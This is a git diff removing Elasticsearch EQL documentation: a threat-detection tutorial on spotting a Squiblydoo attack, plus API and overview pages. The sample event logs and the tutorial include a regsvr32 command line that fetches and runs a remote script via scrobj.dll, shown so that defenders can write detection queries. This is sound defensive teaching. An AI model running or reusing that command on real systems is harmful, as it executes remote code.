attack]. In a -Squiblydoo attack, a `regsvr32.exe` command uses the `scrobj.dll` library to -register and run a remote script. These commands often look like this: - -[source,sh] ----- -"regsvr32.exe /s /u /i: scrobj.dll" ----- - -[discrete] -[[eql-ex-threat-detection-setup]] -=== Setup - -This tutorial uses a test dataset from -https://github.com/redcanaryco/atomic-red-team[Atomic Red Team] that includes -events imitating a Squiblydoo attack. The data has been mapped to -{ecs-ref}[Elastic Common Schema (ECS)] fields. - -To get started: - -. Download https://raw.githubusercontent.com/elastic/elasticsearch/{branch}/docs/src/test/resources/normalized-T1117-AtomicRed-regsvr32.json[`normalized-T1117-AtomicRed-regsvr32.json`]. - -. Use the <> to index the data: -+ -[source,sh] ----- -curl -H "Content-Type: application/json" -XPOST "localhost:9200/my-index-000001/_bulk?pretty&refresh" --data-binary "@normalized-T1117-AtomicRed-regsvr32.json" ----- -// NOTCONSOLE - -. Use the <> to verify the data was indexed: -+ -[source,console] ----- -GET /_cat/indices/my-index-000001?v=true&h=health,status,index,docs.count ----- -// TEST[setup:atomic_red_regsvr32] -+ -The response should show a `docs.count` of `150`. -+ -[source,txt] ----- -health status index docs.count -yellow open my-index-000001 150 ----- -// TESTRESPONSE[non_json] - -[discrete] -[[eql-ex-get-a-count-of-regsvr32-events]] -=== Get a count of regsvr32 events - -First, get a count of events associated with a `regsvr32.exe` process: - -[source,console] ----- -GET /my-index-000001/_eql/search?filter_path=-hits.events <1> -{ - "query": """ - any where process.name == "regsvr32.exe" <2> - """, - "size": 200 <3> -} ----- -// TEST[setup:atomic_red_regsvr32] - -<1> `?filter_path=-hits.events` excludes the `hits.events` property from the -response. This search is only intended to get an event count, not a list of -matching events. -<2> Matches any event with a `process.name` of `regsvr32.exe`. -<3> Returns up to 200 hits for matching events. - -The response returns 143 related events. - -[source,console-result] ----- -{ - "is_partial": false, - "is_running": false, - "took": 60, - "timed_out": false, - "hits": { - "total": { - "value": 143, - "relation": "eq" - } - } -} ----- -// TESTRESPONSE[s/"took": 60/"took": $body.took/] - -[discrete] -[[eql-ex-check-for-command-line-artifacts]] -=== Check for command line artifacts - -`regsvr32.exe` processes were associated with 143 events. But how was -`regsvr32.exe` first called? And who called it? `regsvr32.exe` is a command-line -utility. Narrow your results to processes where the command line was used: - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - process where process.name == "regsvr32.exe" and process.command_line.keyword != null - """ -} ----- -// TEST[setup:atomic_red_regsvr32] - -The query matches one event with an `event.type` of `creation`, indicating the -start of a `regsvr32.exe` process. Based on the event's `process.command_line` -value, `regsvr32.exe` used `scrobj.dll` to register a script, `RegSvr32.sct`. -This fits the behavior of a Squiblydoo attack. - -[source,console-result] ----- -{ - "is_partial": false, - "is_running": false, - "took": 21, - "timed_out": false, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "events": [ - { - "_index": "my-index-000001", - "_id": "gl5MJXMBMk1dGnErnBW8", - "_source": { - "process": { - "parent": { - "name": "cmd.exe", - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", - "executable": "C:\\Windows\\System32\\cmd.exe" - }, - "name": "regsvr32.exe", - "pid": 2012, - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll", - "executable": "C:\\Windows\\System32\\regsvr32.exe", - "ppid": 2652 - }, - "logon_id": 217055, - "@timestamp": 131883573237130000, - "event": { - "category": "process", - "type": "creation" - }, - "user": { - "full_name": "bob", - "domain": "ART-DESKTOP", - "id": "ART-DESKTOP\\bob" - } - } - } - ] - } -} ----- -// TESTRESPONSE[s/"took": 21/"took": $body.took/] -// TESTRESPONSE[s/"_id": "gl5MJXMBMk1dGnErnBW8"/"_id": $body.hits.events.0._id/] - -[discrete] -[[eql-ex-check-for-malicious-script-loads]] -=== Check for malicious script loads - -Check if `regsvr32.exe` later loads the `scrobj.dll` library: - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - library where process.name == "regsvr32.exe" and dll.name == "scrobj.dll" - """ -} ----- -// TEST[setup:atomic_red_regsvr32] - -The query matches an event, confirming `scrobj.dll` was loaded. - -[source,console-result] ----- -{ - "is_partial": false, - "is_running": false, - "took": 5, - "timed_out": false, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "events": [ - { - "_index": "my-index-000001", - "_id": "ol5MJXMBMk1dGnErnBW8", - "_source": { - "process": { - "name": "regsvr32.exe", - "pid": 2012, - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - }, - "@timestamp": 131883573237450016, - "dll": { - "path": "C:\\Windows\\System32\\scrobj.dll", - "name": "scrobj.dll" - }, - "event": { - "category": "library" - } - } - } - ] - } -} ----- -// TESTRESPONSE[s/"took": 5/"took": $body.took/] -// TESTRESPONSE[s/"_id": "ol5MJXMBMk1dGnErnBW8"/"_id": $body.hits.events.0._id/] - -[discrete] -[[eql-ex-detemine-likelihood-of-success]] -=== Determine the likelihood of success - -In many cases, attackers use malicious scripts to connect to remote servers or -download other files. Use an <> to check -for the following series of events: - -. A `regsvr32.exe` process -. A load of the `scrobj.dll` library by the same process -. Any network event by the same process - -Based on the command line value seen in the previous response, you can expect to -find a match. However, this query isn't designed for that specific command. -Instead, it looks for a pattern of suspicious behavior that's generic enough to -detect similar threats. - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - sequence by process.pid - [process where process.name == "regsvr32.exe"] - [library where dll.name == "scrobj.dll"] - [network where true] - """ -} ----- -// TEST[setup:atomic_red_regsvr32] - -The query matches a sequence, indicating the attack likely succeeded. - -[source,console-result] ----- -{ - "is_partial": false, - "is_running": false, - "took": 25, - "timed_out": false, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "sequences": [ - { - "join_keys": [ - 2012 - ], - "events": [ - { - "_index": "my-index-000001", - "_id": "gl5MJXMBMk1dGnErnBW8", - "_source": { - "process": { - "parent": { - "name": "cmd.exe", - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", - "executable": "C:\\Windows\\System32\\cmd.exe" - }, - "name": "regsvr32.exe", - "pid": 2012, - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "command_line": "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll", - "executable": "C:\\Windows\\System32\\regsvr32.exe", - "ppid": 2652 - }, - "logon_id": 217055, - "@timestamp": 131883573237130000, - "event": { - "category": "process", - "type": "creation" - }, - "user": { - "full_name": "bob", - "domain": "ART-DESKTOP", - "id": "ART-DESKTOP\\bob" - } - } - }, - { - "_index": "my-index-000001", - "_id": "ol5MJXMBMk1dGnErnBW8", - "_source": { - "process": { - "name": "regsvr32.exe", - "pid": 2012, - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - }, - "@timestamp": 131883573237450016, - "dll": { - "path": "C:\\Windows\\System32\\scrobj.dll", - "name": "scrobj.dll" - }, - "event": { - "category": "library" - } - } - }, - { - "_index": "my-index-000001", - "_id": "EF5MJXMBMk1dGnErnBa9", - "_source": { - "process": { - "name": "regsvr32.exe", - "pid": 2012, - "entity_id": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - }, - "@timestamp": 131883573238680000, - "destination": { - "address": "151.101.48.133", - "port": "443" - }, - "source": { - "address": "192.168.162.134", - "port": "50505" - }, - "event": { - "category": "network" - }, - "user": { - "full_name": "bob", - "domain": "ART-DESKTOP", - "id": "ART-DESKTOP\\bob" - }, - "network": { - "protocol": "tcp", - "direction": "outbound" - } - } - } - ] - } - ] - } -} ----- -// TESTRESPONSE[s/"took": 25/"took": $body.took/] -// TESTRESPONSE[s/"_id": "gl5MJXMBMk1dGnErnBW8"/"_id": $body.hits.sequences.0.events.0._id/] -// TESTRESPONSE[s/"_id": "ol5MJXMBMk1dGnErnBW8"/"_id": $body.hits.sequences.0.events.1._id/] -// TESTRESPONSE[s/"_id": "EF5MJXMBMk1dGnErnBa9"/"_id": $body.hits.sequences.0.events.2._id/] diff --git a/docs/reference/eql/eql-search-api.asciidoc b/docs/reference/eql/eql-search-api.asciidoc deleted file mode 100644 index 52a04be94e9..00000000000 --- a/docs/reference/eql/eql-search-api.asciidoc +++ /dev/null @@ -1,679 +0,0 @@ -[role="xpack"] -[testenv="basic"] - -[[eql-search-api]] -=== EQL search API -++++ -EQL search -++++ - -beta::[] - -Returns search results for an <> query. - -EQL assumes each document in a data stream or index corresponds to an -event. - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - process where process.name == "regsvr32.exe" - """ -} ----- -// TEST[setup:sec_logs] - -[[eql-search-api-request]] -==== {api-request-title} - -`GET //_eql/search` - -`POST //_eql/search` - -[[eql-search-api-prereqs]] -==== {api-prereq-title} - -See <>. - -[[eql-search-api-limitations]] -===== Limitations - -See <>. - -[[eql-search-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Comma-separated list of data streams, indices, or <> used to limit the request. Accepts wildcard (`*`) expressions. -+ -To search all data streams and indices in a cluster, use -`_all` or `*`. - -[[eql-search-api-query-params]] -==== {api-query-parms-title} - -`allow_no_indices`:: -(Optional, Boolean) -+ -NOTE: This parameter's behavior differs from the `allow_no_indices` parameter -used in other <>. -+ -If `false`, the request returns an error if any wildcard expression, -<>, or `_all` value targets only missing or closed -indices. This behavior applies even if the request targets other open indices. -For example, a request targeting `foo*,bar*` returns an error if an index -starts with `foo` but no index starts with `bar`. -+ -If `true`, only requests that exclusively target missing or closed indices -return an error. For example, a request targeting `foo*,bar*` does not return an -error if an index starts with `foo` but no index starts with `bar`. However, a -request that targets only `bar*` still returns an error. -+ -Defaults to `true`. - - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -`ignore_unavailable`:: -(Optional, Boolean) If `true`, missing or closed indices are not included in the -response. Defaults to `true`. - -`keep_alive`:: -+ --- -(Optional, <>) -Period for which the search and its results are stored on the cluster. Defaults -to `5d` (five days). - -When this period expires, the search and its results are deleted, even if the -search is still ongoing. - -If the <> parameter is -`false`, {es} only stores <> that do not -complete within the period set by the -<> -parameter, regardless of this value. - -[IMPORTANT] -==== -You can also specify this value using the `keep_alive` request body parameter. -If both parameters are specified, only the query parameter is used. -==== --- - -`keep_on_completion`:: -+ --- -(Optional, Boolean) -If `true`, the search and its results are stored on the cluster. - -If `false`, the search and its results are stored on the cluster only if the -request does not complete during the period set by the -<> -parameter. Defaults to `false`. - -[IMPORTANT] -==== -You can also specify this value using the `keep_on_completion` request body -parameter. If both parameters are specified, only the query parameter is used. -==== --- - -`wait_for_completion_timeout`:: -+ --- -(Optional, <>) -Timeout duration to wait for the request to finish. Defaults to no -timeout, meaning the request waits for complete search results. - -If this parameter is specified and the request completes during this period, -complete search results are returned. - -If the request does not complete during this period, the search becomes an -<>. - -[IMPORTANT] -==== -You can also specify this value using the `wait_for_completion_timeout` request -body parameter. If both parameters are specified, only the query parameter is -used. -==== --- - -[role="child_attributes"] -[[eql-search-api-request-body]] -==== {api-request-body-title} - -`event_category_field`:: -(Required*, string) -Field containing the event classification, such as `process`, `file`, or -`network`. -+ -Defaults to `event.category`, as defined in the {ecs-ref}/ecs-event.html[Elastic -Common Schema (ECS)]. If a data stream or index does not contain the -`event.category` field, this value is required. -+ -The event category field must be mapped as a field type in the -<> family. - -`fetch_size`:: -(Optional, integer) -Maximum number of events to search at a time for sequence queries. Defaults to -`1000`. -+ -This value must be greater than `2` but cannot exceed the value of the -<> setting, which defaults to -`10000`. -+ -Internally, a sequence query fetches and paginates sets of events to search for -matches. This parameter controls the size of those sets. This parameter does not -limit the total number of events searched or the number of matching events -returned. -+ -A greater `fetch_size` value often increases search speed but uses more memory. - -`filter`:: -(Optional, <>) -Query, written in query DSL, used to filter the events on which the EQL query -runs. - -`keep_alive`:: -+ --- -(Optional, <>) -Period for which the search and its results are stored on the cluster. Defaults -to `5d` (five days). - -When this period expires, the search and its results are deleted, even if the -search is still ongoing. - -If the <> parameter is -`false`, {es} only stores <> that do not -complete within the period set by the -<> -parameter, regardless of this value. - -[IMPORTANT] -==== -You can also specify this value using the `keep_alive` query parameter. -If both parameters are specified, only the query parameter is used. -==== --- - -[[eql-search-api-keep-on-completion]] -`keep_on_completion`:: -+ --- -(Optional, Boolean) -If `true`, the search and its results are stored on the cluster. - -If `false`, the search and its results are stored on the cluster only if the -request does not complete during the period set by the -<> -parameter. Defaults to `false`. - -[IMPORTANT] -==== -You can also specify this value using the `keep_on_completion` query parameter. -If both parameters are specified, only the query parameter is used. -==== --- - -[[eql-search-api-request-query-param]] -`query`:: -(Required, string) -<> query you wish to run. - -`result_position`:: -(Optional, enum) -Set of matching events or sequences to return. -+ -.Valid values for `result_position` -[%collapsible%open] -==== -`head`:: -(Default) -Return the earliest matches, similar to the {wikipedia}/Head_(Unix)[Unix head -command]. - -`tail`:: -Return the most recent matches, similar to the {wikipedia}/Tail_(Unix)[Unix tail -command]. -==== -+ -NOTE: This parameter may change the set of returned hits. However, it does not -change the sort order of hits in the response. - -`size`:: -(Optional, integer or float) -For <>, the maximum number of matching events to -return. -+ -For <>, the maximum number of matching sequences -to return. -+ -Defaults to `10`. This value must be greater than `0`. -+ -NOTE: You cannot use <>, such as `head` or `tail`, to exceed -this value. - -[[eql-search-api-tiebreaker-field]] -`tiebreaker_field`:: -(Optional, string) -Field used to sort hits with the same -<> in ascending order. See -<>. - -[[eql-search-api-timestamp-field]] -`timestamp_field`:: -+ --- -(Required*, string) -Field containing event timestamp. - -Defaults to `@timestamp`, as defined in the -{ecs-ref}/ecs-event.html[Elastic Common Schema (ECS)]. If a data stream or index -does not contain the `@timestamp` field, this value is required. - -Events in the API response are sorted by this field's value, converted to -milliseconds since the {wikipedia}/Unix_time[Unix epoch], in -ascending order. - -The timestamp field should be mapped as a <>. The -<> field type is not supported. --- - -[[eql-search-api-wait-for-completion-timeout]] -`wait_for_completion_timeout`:: -+ --- -(Optional, <>) -Timeout duration to wait for the request to finish. Defaults to no -timeout, meaning the request waits for complete search results. - -If this parameter is specified and the request completes during this period, -complete search results are returned. - -If the request does not complete during this period, the search becomes an -<>. - -[IMPORTANT] -==== -You can also specify this value using the `wait_for_completion_timeout` query -parameter. If both parameters are specified, only the query parameter is used. -==== --- - -[role="child_attributes"] -[[eql-search-api-response-body]] -==== {api-response-body-title} - -[[eql-search-api-response-body-search-id]] -`id`:: -+ --- -(string) -Identifier for the search. - -This search ID is only provided if one of the following conditions is met: - -* A search request does not return complete results during the - <> - parameter's timeout period, becoming an <>. - -* The search request's <> - parameter is `true`. - -You can use this ID with the <> to get the current status and available results for the search. --- - -`is_partial`:: -(Boolean) -If `true`, the response does not contain complete search results. - -`is_running`:: -+ --- -(Boolean) -If `true`, the search request is still executing. - -[IMPORTANT] -==== -If this parameter and the `is_partial` parameter are `true`, the search is an -<>. If the `keep_alive` period does not -pass, the complete search results will be available when the search completes. - -If `is_partial` is `true` but `is_running` is `false`, the search returned -partial results due to a failure. Only some shards returned results or the node -coordinating the search failed. -==== --- - -`took`:: -+ --- -(integer) -Milliseconds it took {es} to execute the request. - -This value is calculated by measuring the time elapsed -between receipt of a request on the coordinating node -and the time at which the coordinating node is ready to send the response. - -Took time includes: - -* Communication time between the coordinating node and data nodes -* Time the request spends in the `search` <>, - queued for execution -* Actual execution time - -Took time does *not* include: - -* Time needed to send the request to {es} -* Time needed to serialize the JSON response -* Time needed to send the response to a client --- - -`timed_out`:: -(Boolean) -If `true`, the request timed out before completion. - -`hits`:: -(object) -Contains matching events and sequences. Also contains related metadata. -+ -.Properties of `hits` -[%collapsible%open] -==== - -`total`:: -(object) -Metadata about the number of matching events or sequences. -+ -.Properties of `total` -[%collapsible%open] -===== - -`value`:: -(integer) -For <>, the total number of matching events. -+ -For <>, the total number of matching sequences. - -`relation`:: -+ --- -(string) -Indicates whether the number of events or sequences returned is accurate or a -lower bound. - -Returned values are: - -`eq`::: Accurate -`gte`::: Lower bound, including returned events or sequences --- -===== - -`sequences`:: -(array of objects) -Contains event sequences matching the query. Each object represents a -matching sequence. This parameter is only returned for EQL queries containing -a <>. -+ -.Properties of `sequences` objects -[%collapsible%open] -===== -`join_keys`:: -(array of values) -Shared field values used to constrain matches in the sequence. These are defined -using the <> in the EQL query syntax. - -`events`:: -(array of objects) -Contains events matching the query. Each object represents a -matching event. -+ -.Properties of `events` objects -[%collapsible%open] -====== -`_index`:: -(string) -Name of the index containing the event. - -`_id`:: -(string) -Unique identifier for the event. -This ID is only unique within the index. - -`_source`:: -(object) -Original JSON body passed for the event at index time. -====== -===== - -[[eql-search-api-response-events]] -`events`:: -(array of objects) -Contains events matching the query. Each object represents a -matching event. -+ -.Properties of `events` objects -[%collapsible%open] -===== -`_index`:: -(string) -Name of the index containing the event. - -`_id`:: -(string) -(string) -Unique identifier for the event. -This ID is only unique within the index. - -`_source`:: -(object) -Original JSON body passed for the event at index time. -===== -==== - -[[eql-search-api-example]] -==== {api-examples-title} - -[[eql-search-api-basic-query-ex]] -===== Basic query example - -The following EQL search request searches for events with an `event.category` of -`process` that meet the following conditions: - -* A `process.name` of `cmd.exe` -* An `process.pid` other than `2013` - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - process where (process.name == "cmd.exe" and process.pid != 2013) - """ -} ----- -// TEST[setup:sec_logs] - -The API returns the following response. Matching events in the `hits.events` -property are sorted by <>, converted -to milliseconds since the {wikipedia}/Unix_time[Unix epoch], -in ascending order. - -If two or more events share the same timestamp, the -<> field is used to sort -the events in ascending order. - -[source,console-result] ----- -{ - "is_partial": false, - "is_running": false, - "took": 6, - "timed_out": false, - "hits": { - "total": { - "value": 2, - "relation": "eq" - }, - "events": [ - { - "_index": "my-index-000001", - "_id": "babI3XMBI9IjHuIqU0S_", - "_source": { - "@timestamp": "2099-12-06T11:04:05.000Z", - "event": { - "category": "process", - "id": "edwCRnyD", - "sequence": 1 - }, - "process": { - "pid": 2012, - "name": "cmd.exe", - "executable": "C:\\Windows\\System32\\cmd.exe" - } - } - }, - { - "_index": "my-index-000001", - "_id": "b6bI3XMBI9IjHuIqU0S_", - "_source": { - "@timestamp": "2099-12-07T11:06:07.000Z", - "event": { - "category": "process", - "id": "cMyt5SZ2", - "sequence": 3 - }, - "process": { - "pid": 2012, - "name": "cmd.exe", - "executable": "C:\\Windows\\System32\\cmd.exe" - } - } - } - ] - } -} ----- -// TESTRESPONSE[s/"took": 6/"took": $body.took/] -// TESTRESPONSE[s/"_id": "babI3XMBI9IjHuIqU0S_"/"_id": $body.hits.events.0._id/] -// TESTRESPONSE[s/"_id": "b6bI3XMBI9IjHuIqU0S_"/"_id": $body.hits.events.1._id/] - -[[eql-search-api-sequence-ex]] -===== Sequence query example - -The following EQL search request matches a <> of events -that: - -. Start with an event with: -+ --- -* An `event.category` of `file` -* A `file.name` of `cmd.exe` -* An `process.pid` other than `2013` --- -. Followed by an event with: -+ --- -* An `event.category` of `process` -* A `process.executable` that contains the substring `regsvr32` --- - -These events must also share the same `process.pid` value. - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - sequence by process.pid - [ file where file.name == "cmd.exe" and process.pid != 2013 ] - [ process where stringContains(process.executable, "regsvr32") ] - """ -} ----- -// TEST[setup:sec_logs] - -The API returns the following response. Matching sequences are included in the -`hits.sequences` property. The `hits.sequences.join_keys` property contains the -shared `process.pid` value for each matching event. - -[source,console-result] ----- -{ - "is_partial": false, - "is_running": false, - "took": 6, - "timed_out": false, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "sequences": [ - { - "join_keys": [ - 2012 - ], - "events": [ - { - "_index": "my-index-000001", - "_id": "AtOJ4UjUBAAx3XR5kcCM", - "_source": { - "@timestamp": "2099-12-06T11:04:07.000Z", - "event": { - "category": "file", - "id": "dGCHwoeS", - "sequence": 2 - }, - "file": { - "accessed": "2099-12-07T11:07:08.000Z", - "name": "cmd.exe", - "path": "C:\\Windows\\System32\\cmd.exe", - "type": "file", - "size": 16384 - }, - "process": { - "pid": 2012, - "name": "cmd.exe", - "executable": "C:\\Windows\\System32\\cmd.exe" - } - } - }, - { - "_index": "my-index-000001", - "_id": "OQmfCaduce8zoHT93o4H", - "_source": { - "@timestamp": "2099-12-07T11:07:09.000Z", - "event": { - "category": "process", - "id": "aR3NWVOs", - "sequence": 4 - }, - "process": { - "pid": 2012, - "name": "regsvr32.exe", - "command_line": "regsvr32.exe /s /u /i:https://...RegSvr32.sct scrobj.dll", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - } - } - } - ] - } - ] - } -} ----- -// TESTRESPONSE[s/"took": 6/"took": $body.took/] -// TESTRESPONSE[s/"_id": "AtOJ4UjUBAAx3XR5kcCM"/"_id": $body.hits.sequences.0.events.0._id/] -// TESTRESPONSE[s/"_id": "OQmfCaduce8zoHT93o4H"/"_id": $body.hits.sequences.0.events.1._id/] diff --git a/docs/reference/eql/eql.asciidoc b/docs/reference/eql/eql.asciidoc deleted file mode 100644 index 6cbdf2975dc..00000000000 --- a/docs/reference/eql/eql.asciidoc +++ /dev/null @@ -1,621 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[eql]] -= EQL search -++++ -EQL -++++ - -beta::[] - -Event Query Language (EQL) is a query language for event-based time series -data, such as logs, metrics, and traces. - -[discrete] -[[eql-advantages]] -== Advantages of EQL - -* *EQL lets you express relationships between events.* + -Many query languages allow you to match single events. EQL lets you match a -sequence of events across different event categories and time spans. - -* *EQL has a low learning curve.* + -<> looks like other common query languages, such as SQL. -EQL lets you write and read queries intuitively, which makes for quick, -iterative searching. - -* *EQL is designed for security use cases.* + -While you can use it for any event-based data, we created EQL for threat -hunting. EQL not only supports indicator of compromise (IOC) searches but can -describe activity that goes beyond IOCs. - -[discrete] -[[eql-required-fields]] -== Required fields - -To run an EQL search, the searched data stream or index must contain a -_timestamp_ and _event category_ field. By default, EQL uses the `@timestamp` -and `event.category` fields from the {ecs-ref}[Elastic Common Schema -(ECS)]. To use a different timestamp or event category field, see -<>. - -TIP: While no schema is required to use EQL, we recommend using the -{ecs-ref}[ECS]. EQL searches are designed to work with core ECS fields by -default. - -[discrete] -[[run-an-eql-search]] -== Run an EQL search - -Use the <> to run a <>: - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - process where process.name == "regsvr32.exe" - """ -} ----- -// TEST[setup:sec_logs] - -By default, basic EQL queries return the top 10 matching events in the -`hits.events` property. These hits are sorted by timestamp, converted to -milliseconds since the {wikipedia}/Unix_time[Unix epoch], in ascending order. - -[source,console-result] ----- -{ - "is_partial": false, - "is_running": false, - "took": 60, - "timed_out": false, - "hits": { - "total": { - "value": 2, - "relation": "eq" - }, - "events": [ - { - "_index": "my-index-000001", - "_id": "OQmfCaduce8zoHT93o4H", - "_source": { - "@timestamp": "2099-12-07T11:07:09.000Z", - "event": { - "category": "process", - "id": "aR3NWVOs", - "sequence": 4 - }, - "process": { - "pid": 2012, - "name": "regsvr32.exe", - "command_line": "regsvr32.exe /s /u /i:https://...RegSvr32.sct scrobj.dll", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - } - } - }, - { - "_index": "my-index-000001", - "_id": "xLkCaj4EujzdNSxfYLbO", - "_source": { - "@timestamp": "2099-12-07T11:07:10.000Z", - "event": { - "category": "process", - "id": "GTSmSqgz0U", - "sequence": 6, - "type": "termination" - }, - "process": { - "pid": 2012, - "name": "regsvr32.exe", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - } - } - } - ] - } -} ----- -// TESTRESPONSE[s/"took": 60/"took": $body.took/] -// TESTRESPONSE[s/"_id": "OQmfCaduce8zoHT93o4H"/"_id": $body.hits.events.0._id/] -// TESTRESPONSE[s/"_id": "xLkCaj4EujzdNSxfYLbO"/"_id": $body.hits.events.1._id/] - -Use the `size` parameter to get a smaller or larger set of hits: - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - process where process.name == "regsvr32.exe" - """, - "size": 50 -} ----- -// TEST[setup:sec_logs] - -[discrete] -[[eql-search-sequence]] -=== Search for a sequence of events - -Use EQL's <> to search for a series of -ordered events. List the event items in ascending chronological order, -with the most recent event listed last: - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - sequence - [ process where process.name == "regsvr32.exe" ] - [ file where stringContains(file.name, "scrobj.dll") ] - """ -} ----- -// TEST[setup:sec_logs] - -Matching sequences are returned in the `hits.sequences` property. - -[source,console-result] ----- -{ - "is_partial": false, - "is_running": false, - "took": 60, - "timed_out": false, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "sequences": [ - { - "events": [ - { - "_index": "my-index-000001", - "_id": "OQmfCaduce8zoHT93o4H", - "_source": { - "@timestamp": "2099-12-07T11:07:09.000Z", - "event": { - "category": "process", - "id": "aR3NWVOs", - "sequence": 4 - }, - "process": { - "pid": 2012, - "name": "regsvr32.exe", - "command_line": "regsvr32.exe /s /u /i:https://...RegSvr32.sct scrobj.dll", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - } - } - }, - { - "_index": "my-index-000001", - "_id": "yDwnGIJouOYGBzP0ZE9n", - "_source": { - "@timestamp": "2099-12-07T11:07:10.000Z", - "event": { - "category": "file", - "id": "tZ1NWVOs", - "sequence": 5 - }, - "process": { - "pid": 2012, - "name": "regsvr32.exe", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - }, - "file": { - "path": "C:\\Windows\\System32\\scrobj.dll", - "name": "scrobj.dll" - } - } - } - ] - } - ] - } -} ----- -// TESTRESPONSE[s/"took": 60/"took": $body.took/] -// TESTRESPONSE[s/"_id": "OQmfCaduce8zoHT93o4H"/"_id": $body.hits.sequences.0.events.0._id/] -// TESTRESPONSE[s/"_id": "yDwnGIJouOYGBzP0ZE9n"/"_id": $body.hits.sequences.0.events.1._id/] - -Use the <> to constrain -matching sequences to a timespan: - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - sequence with maxspan=1h - [ process where process.name == "regsvr32.exe" ] - [ file where stringContains(file.name, "scrobj.dll") ] - """ -} ----- -// TEST[setup:sec_logs] - -Use the <> to match events that share the -same field values: - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - sequence with maxspan=1h - [ process where process.name == "regsvr32.exe" ] by process.pid - [ file where stringContains(file.name, "scrobj.dll") ] by process.pid - """ -} ----- -// TEST[setup:sec_logs] - -If a field value should be shared across all events, use the `sequence by` -keyword. The following query is equivalent to the previous one. - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - sequence by process.pid with maxspan=1h - [ process where process.name == "regsvr32.exe" ] - [ file where stringContains(file.name, "scrobj.dll") ] - """ -} ----- -// TEST[setup:sec_logs] - -The `hits.sequences.join_keys` property contains the shared field values. - -[source,console-result] ----- -{ - "is_partial": false, - "is_running": false, - "took": 60, - "timed_out": false, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "sequences": [ - { - "join_keys": [ - 2012 - ], - "events": [ - { - "_index": "my-index-000001", - "_id": "OQmfCaduce8zoHT93o4H", - "_source": { - "@timestamp": "2099-12-07T11:07:09.000Z", - "event": { - "category": "process", - "id": "aR3NWVOs", - "sequence": 4 - }, - "process": { - "pid": 2012, - "name": "regsvr32.exe", - "command_line": "regsvr32.exe /s /u /i:https://...RegSvr32.sct scrobj.dll", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - } - } - }, - { - "_index": "my-index-000001", - "_id": "yDwnGIJouOYGBzP0ZE9n", - "_source": { - "@timestamp": "2099-12-07T11:07:10.000Z", - "event": { - "category": "file", - "id": "tZ1NWVOs", - "sequence": 5 - }, - "process": { - "pid": 2012, - "name": "regsvr32.exe", - "executable": "C:\\Windows\\System32\\regsvr32.exe" - }, - "file": { - "path": "C:\\Windows\\System32\\scrobj.dll", - "name": "scrobj.dll" - } - } - } - ] - } - ] - } -} ----- -// TESTRESPONSE[s/"took": 60/"took": $body.took/] -// TESTRESPONSE[s/"_id": "OQmfCaduce8zoHT93o4H"/"_id": $body.hits.sequences.0.events.0._id/] -// TESTRESPONSE[s/"_id": "yDwnGIJouOYGBzP0ZE9n"/"_id": $body.hits.sequences.0.events.1._id/] - -Use the <> to specify an expiration -event for sequences. Matching sequences must end before this event. - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "query": """ - sequence by process.pid with maxspan=1h - [ process where process.name == "regsvr32.exe" ] - [ file where stringContains(file.name, "scrobj.dll") ] - until [ process where event.type == "termination" ] - """ -} ----- -// TEST[setup:sec_logs] - -[discrete] -[[specify-a-timestamp-or-event-category-field]] -=== Specify a timestamp or event category field - -The EQL search API uses the `@timestamp` and `event.category` fields from the -{ecs-ref}[ECS] by default. To specify different fields, use the -`timestamp_field` and `event_category_field` parameters: - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "timestamp_field": "file.accessed", - "event_category_field": "file.type", - "query": """ - file where (file.size > 1 and file.type == "file") - """ -} ----- -// TEST[setup:sec_logs] - -The event category field must be mapped as a <> family field -type. The timestamp field should be mapped as a <> field type. -<> timestamp fields are not supported. You cannot use a -<> field or the sub-fields of a `nested` field as the timestamp -or event category field. - -[discrete] -[[eql-search-specify-a-sort-tiebreaker]] -=== Specify a sort tiebreaker - -By default, the EQL search API returns matching hits by timestamp. If two or -more events share the same timestamp, {es} uses a tiebreaker field value to sort -the events in ascending order. {es} orders events with no -tiebreaker value after events with a value. - -If you don't specify a tiebreaker field or 